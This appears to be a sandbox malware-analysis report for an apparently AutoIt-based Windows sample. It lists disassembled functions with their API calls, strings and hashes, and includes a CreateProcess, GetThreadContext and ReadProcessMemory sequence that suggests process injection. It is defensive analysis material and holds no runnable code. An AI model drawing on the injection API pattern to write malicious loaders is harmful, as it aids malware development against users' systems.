                                                            • Source File: 00000000.00000002.2087821724.0000000000D50000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d50000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: CreateFileSleep
                                                            • String ID: EJU6BNRJAUG3M4YWD1R7LH57
                                                            • API String ID: 2694422964-3722977972
                                                            • Opcode ID: 4bf3123f9a21e78b680c3e5e23c3cd07603906340775b1e1a5ac274e18d85573
                                                            • Instruction ID: 496836f30a20f7b99fccb10bc3d2dd828b0a7c7df77dc69d20d11a12b6a855b1
                                                            • Opcode Fuzzy Hash: 4bf3123f9a21e78b680c3e5e23c3cd07603906340775b1e1a5ac274e18d85573
                                                            • Instruction Fuzzy Hash: 4A51A330D04388DAEF11DBB4C854BEEBBB9AF15305F144198E6497B2C1D6B91B48CBB5

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1491 69407c-694092 1492 694098-6940ad call 697a16 1491->1492 1493 69416f-694173 1491->1493 1496 6cd3c8-6cd3d7 LoadStringW 1492->1496 1497 6940b3-6940d3 call 697bcc 1492->1497 1499 6cd3e2-6cd3fa call 697b2e call 696fe3 1496->1499 1497->1499 1501 6940d9-6940dd 1497->1501 1509 6940ed-69416a call 6b2de0 call 69454e call 6b2dbc Shell_NotifyIconW call 695904 1499->1509 1513 6cd400-6cd41e call 697cab call 696fe3 call 697cab 1499->1513 1503 6940e3-6940e8 call 697b2e 1501->1503 1504 694174-69417d call 698047 1501->1504 1503->1509 1504->1509 1509->1493 1513->1509
                                                            APIs
                                                            • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 006CD3D7
                                                              • Part of subcall function 00697BCC: _memmove.LIBCMT ref: 00697C06
                                                            • _memset.LIBCMT ref: 006940FC
                                                            • _wcscpy.LIBCMT ref: 00694150
                                                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00694160
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                            • String ID: Line:
                                                            • API String ID: 3942752672-1585850449
                                                            • Opcode ID: 873ef80b615ee2295fc6c7455503b23740997aa72eeedd6df3befffcd1037d16
                                                            • Instruction ID: 965c28d248d5ccaf1917d3e631ad8cff31cd777cafa78ab93d3addd74d7c64a9
                                                            • Opcode Fuzzy Hash: 873ef80b615ee2295fc6c7455503b23740997aa72eeedd6df3befffcd1037d16
                                                            • Instruction Fuzzy Hash: 8531EFB1008304AFDBA1EB60DC46FEB77DEAF40310F10851EF585925A1EFB4A649C78A
                                                            APIs
                                                              • Part of subcall function 00694DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,007552F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00694E0F
                                                            • _free.LIBCMT ref: 006CE263
                                                            • _free.LIBCMT ref: 006CE2AA
                                                              • Part of subcall function 00696A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00696BAD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: _free$CurrentDirectoryLibraryLoad
                                                            • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                            • API String ID: 2861923089-1757145024
                                                            • Opcode ID: 5e8bcbc529cc1a297b6d5354f82a6022464b44670516b62b341ef08fea0af6a0
                                                            • Instruction ID: e0cd942a72363d419421dc136407a08592b67b5efd9239fb0ddbc583696a80f3
                                                            • Opcode Fuzzy Hash: 5e8bcbc529cc1a297b6d5354f82a6022464b44670516b62b341ef08fea0af6a0
                                                            • Instruction Fuzzy Hash: 5E918F71A10219AFCF04EFA4C891EFDB7BAFF04310B14442EF815AB2A1DB759A55CB54
                                                            APIs
                                                            • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,006935A1,SwapMouseButtons,00000004,?), ref: 006935D4
                                                            • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,006935A1,SwapMouseButtons,00000004,?,?,?,?,00692754), ref: 006935F5
                                                            • RegCloseKey.KERNELBASE(00000000,?,?,006935A1,SwapMouseButtons,00000004,?,?,?,?,00692754), ref: 00693617
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: CloseOpenQueryValue
                                                            • String ID: Control Panel\Mouse
                                                            • API String ID: 3677997916-824357125
                                                            • Opcode ID: b97db846e38984d027dcc9d5878e6b6607c873aff4fc1992a414b0bbdc62124a
                                                            • Instruction ID: 7e2d03841b87b6489c10059bfecf89c072ae1e976fc4dfe47cb995d87cb2a50a
                                                            • Opcode Fuzzy Hash: b97db846e38984d027dcc9d5878e6b6607c873aff4fc1992a414b0bbdc62124a
                                                            • Instruction Fuzzy Hash: 89113371610228BADF208FA8DC80AEABBAEEF04740F008469E805D7310E2719E419BA4
                                                            APIs
                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 00D5267B
                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00D52711
                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00D52733
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087821724.0000000000D50000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d50000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                            • String ID:
                                                            • API String ID: 2438371351-0
                                                            • Opcode ID: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                                            • Instruction ID: 9a46ae35e6eec0cc520512671491a2be784e19dc5cafc75aa64e6463f4cbd6a3
                                                            • Opcode Fuzzy Hash: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                                            • Instruction Fuzzy Hash: AC620C30A142589BEB24CFA4C850BEEB372EF58301F1091A9D50DEB394E7759E85CF69
                                                            APIs
                                                              • Part of subcall function 00694EE5: _fseek.LIBCMT ref: 00694EFD
                                                              • Part of subcall function 006F9734: _wcscmp.LIBCMT ref: 006F9824
                                                              • Part of subcall function 006F9734: _wcscmp.LIBCMT ref: 006F9837
                                                            • _free.LIBCMT ref: 006F96A2
                                                            • _free.LIBCMT ref: 006F96A9
                                                            • _free.LIBCMT ref: 006F9714
                                                              • Part of subcall function 006B2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,006B9A24), ref: 006B2D69
                                                              • Part of subcall function 006B2D55: GetLastError.KERNEL32(00000000,?,006B9A24), ref: 006B2D7B
                                                            • _free.LIBCMT ref: 006F971C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                            • String ID:
                                                            • API String ID: 1552873950-0
                                                            • Opcode ID: 57d0d2f04a8deae04fb8388104c663c78e861137db03f429770e89b5c3a69279
                                                            • Instruction ID: c95ff51ad248cb345dc928551b2bf3429735d4d63c84fddadf51a4ee3dc26203
                                                            • Opcode Fuzzy Hash: 57d0d2f04a8deae04fb8388104c663c78e861137db03f429770e89b5c3a69279
                                                            • Instruction Fuzzy Hash: D3515FB1D14219AFDF649F64CC81AEEBBBAEF48300F10049EF209A7241DB715A81CF58
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                            • String ID:
                                                            • API String ID: 2782032738-0
                                                            • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                            • Instruction ID: 188a15ad8b8c3ed6e083c9ecd6b74648a89b1a06ea9c234917ba4c98195f9e24
                                                            • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                            • Instruction Fuzzy Hash: 1741C2B4A007459BDB28CEA9C8809EE7BA7EF46360B24817DE85587742EF70DDC1CB40
                                                            APIs
                                                            • _memset.LIBCMT ref: 006944CF
                                                              • Part of subcall function 0069407C: _memset.LIBCMT ref: 006940FC
                                                              • Part of subcall function 0069407C: _wcscpy.LIBCMT ref: 00694150
                                                              • Part of subcall function 0069407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00694160
                                                            • KillTimer.USER32(?,00000001,?,?), ref: 00694524
                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00694533
                                                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 006CD4B9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                            • String ID:
                                                            • API String ID: 1378193009-0
                                                            • Opcode ID: 70dbfe4892d1415d6be30b5f5d95f234bc26662e243d5fc0ab6a4f2eae9c1e6e
                                                            • Instruction ID: 0e7563e841e8a33738100364edf83bc70f2ed2845dd03ecd8c402fab5dfe4ad9
                                                            • Opcode Fuzzy Hash: 70dbfe4892d1415d6be30b5f5d95f234bc26662e243d5fc0ab6a4f2eae9c1e6e
                                                            • Instruction Fuzzy Hash: 0421F5B0504784AFEB328B648855FF6BBEDEF01304F0480ADE78E97281C7742A85CB45
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID: AU3!P/r$EA06
                                                            • API String ID: 4104443479-480415842
                                                            • Opcode ID: 731f4702ff21bf22311ab7aba52423fcc95b41db1587cd44ddd3681a971baec9
                                                            • Instruction ID: 5fbc93cb844c26095abe8ceb48f88df44f843ba4e6b5394291718a4bf6942ea2
                                                            • Opcode Fuzzy Hash: 731f4702ff21bf22311ab7aba52423fcc95b41db1587cd44ddd3681a971baec9
                                                            • Instruction Fuzzy Hash: 4F417D25A041585BDF259B648891FFE7FAFDF45300F284579EC829BB82DE209D4B83A1
                                                            APIs
                                                            • _memset.LIBCMT ref: 006CEA39
                                                            • GetOpenFileNameW.COMDLG32(?), ref: 006CEA83
                                                              • Part of subcall function 00694750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00694743,?,?,006937AE,?), ref: 00694770
                                                              • Part of subcall function 006B0791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006B07B0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Name$Path$FileFullLongOpen_memset
                                                            • String ID: X
                                                            • API String ID: 3777226403-3081909835
                                                            • Opcode ID: d5a280758a82d665b72524b8e4855d26cda02c64976ad9e8474a04c41c82d421
                                                            • Instruction ID: e6522267ab1a4af540796cd1932bf0f7dee27b09957759ece65c9549b4b4f228
                                                            • Opcode Fuzzy Hash: d5a280758a82d665b72524b8e4855d26cda02c64976ad9e8474a04c41c82d421
                                                            • Instruction Fuzzy Hash: B9218471A102489BDF819F94C845BEE7BFEAF49714F04405AE408AB241DBB859898FA5
                                                            APIs
                                                            • GetTempPathW.KERNEL32(00000104,?), ref: 006F98F8
                                                            • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 006F990F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Temp$FileNamePath
                                                            • String ID: aut
                                                            • API String ID: 3285503233-3010740371
                                                            • Opcode ID: 1d695a57a47ede976b19c7dc012035fde38b5c92c139cb35f8806b580392100b
                                                            • Instruction ID: 56ebd0469d3cb0284bebd5e79010194f6a3c90309e6aa122545dbd1b2de5812a
                                                            • Opcode Fuzzy Hash: 1d695a57a47ede976b19c7dc012035fde38b5c92c139cb35f8806b580392100b
                                                            • Instruction Fuzzy Hash: CCD05E7954030DABDB50ABA4DC0EFDE777CE704700F0082B1FA54920E1EAB895988B95
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 851e2826e882f0415f31c1bfe4067c987b1bb90095d27daa99cae1911a1feda8
                                                            • Instruction ID: bc3427c0d0fb362b19c2dc102c073fea125e4bd6338f8d5205fb4b2c51cdd931
                                                            • Opcode Fuzzy Hash: 851e2826e882f0415f31c1bfe4067c987b1bb90095d27daa99cae1911a1feda8
                                                            • Instruction Fuzzy Hash: 54F14A71608301DFCB14DF28C584A6ABBE5FF88314F148A2EF8999B291D734E945CF82
                                                            APIs
                                                            • _memset.LIBCMT ref: 00694370
                                                            • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00694415
                                                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00694432
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: IconNotifyShell_$_memset
                                                            • String ID:
                                                            • API String ID: 1505330794-0
                                                            • Opcode ID: f9155765d12cf78d6d6d2db32d5e641d6f0eef8f6f7962121335f99ad7ebd81e
                                                            • Instruction ID: d72b6b908b4a086442cc7a35f928dc05167a3d60a037fd2e5414206fc2d33ad8
                                                            • Opcode Fuzzy Hash: f9155765d12cf78d6d6d2db32d5e641d6f0eef8f6f7962121335f99ad7ebd81e
                                                            • Instruction Fuzzy Hash: EA31C1B05057019FDB20DF34D884ADBBBF9FB48309F00492EE68AC2751EBB4A945CB56
                                                            APIs
                                                            • __FF_MSGBANNER.LIBCMT ref: 006B5733
                                                              • Part of subcall function 006BA16B: __NMSG_WRITE.LIBCMT ref: 006BA192
                                                              • Part of subcall function 006BA16B: __NMSG_WRITE.LIBCMT ref: 006BA19C
                                                            • __NMSG_WRITE.LIBCMT ref: 006B573A
                                                              • Part of subcall function 006BA1C8: GetModuleFileNameW.KERNEL32(00000000,007533BA,00000104,?,00000001,00000000), ref: 006BA25A
                                                              • Part of subcall function 006BA1C8: ___crtMessageBoxW.LIBCMT ref: 006BA308
                                                              • Part of subcall function 006B309F: ___crtCorExitProcess.LIBCMT ref: 006B30A5
                                                              • Part of subcall function 006B309F: ExitProcess.KERNEL32 ref: 006B30AE
                                                              • Part of subcall function 006B8B28: __getptd_noexit.LIBCMT ref: 006B8B28
                                                            • RtlAllocateHeap.NTDLL(00D10000,00000000,00000001,00000000,?,?,?,006B0DD3,?), ref: 006B575F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                            • String ID:
                                                            • API String ID: 1372826849-0
                                                            • Opcode ID: 651f558640166c46ce6a6dd14e4b099b371cb1433c51ac497f3d5411854cf3b8
                                                            • Instruction ID: c3960a85746c521ef34139fbf7bde5826c8b1f4e8a361c3e8171438f67a1eb1d
                                                            • Opcode Fuzzy Hash: 651f558640166c46ce6a6dd14e4b099b371cb1433c51ac497f3d5411854cf3b8
                                                            • Instruction Fuzzy Hash: 8B01D2F5300B11EED6902B79AC42BEE778A9B42362F100539F5069B292DEB49CC18769
                                                            APIs
                                                            • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,006F9548,?,?,?,?,?,00000004), ref: 006F98BB
                                                            • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,006F9548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 006F98D1
                                                            • CloseHandle.KERNEL32(00000000,?,006F9548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 006F98D8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: File$CloseCreateHandleTime
                                                            • String ID:
                                                            • API String ID: 3397143404-0
                                                            • Opcode ID: b4bde4490bbbc83d3af6bdfea77683cfe3052898e610f8cb928ef8f3de8501ed
                                                            • Instruction ID: 6b6ab230f6f1efa6d53e62f0007ab9984f0d4a4b863aea02c51bfbe2719433ae
                                                            • Opcode Fuzzy Hash: b4bde4490bbbc83d3af6bdfea77683cfe3052898e610f8cb928ef8f3de8501ed
                                                            • Instruction Fuzzy Hash: B8E08632180618B7D7211B58EC09FDA7F29AB06760F10C221FB24691E0C7B55511979C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: CALL
                                                            • API String ID: 0-4196123274
                                                            • Opcode ID: 7115cad8cea6c4c5a275da79a471f0c907e749033553b5ce371a576205d17b31
                                                            • Instruction ID: 39827467d99e702b08d959b43db3492c3837c8868dbf2323a66fa325df795e84
                                                            • Opcode Fuzzy Hash: 7115cad8cea6c4c5a275da79a471f0c907e749033553b5ce371a576205d17b31
                                                            • Instruction Fuzzy Hash: B9225570608241DFDB64DF54C490AAABBE6FF84304F15896DE88A8B762D731EC45CB86
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID:
                                                            • API String ID: 4104443479-0
                                                            • Opcode ID: 33ee2adab76b61eaad11b048421302318a8f1e1106a9e19eb2b4e9a6ccc829cf
                                                            • Instruction ID: 1514089513fabb7e63418092ab8834c66131478991e48244a84ddb87b3f4ef1b
                                                            • Opcode Fuzzy Hash: 33ee2adab76b61eaad11b048421302318a8f1e1106a9e19eb2b4e9a6ccc829cf
                                                            • Instruction Fuzzy Hash: 2241F37190820D9FDB50EFA8D8859FABBABEF09340B24456DE29597382DB74EC01C764
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
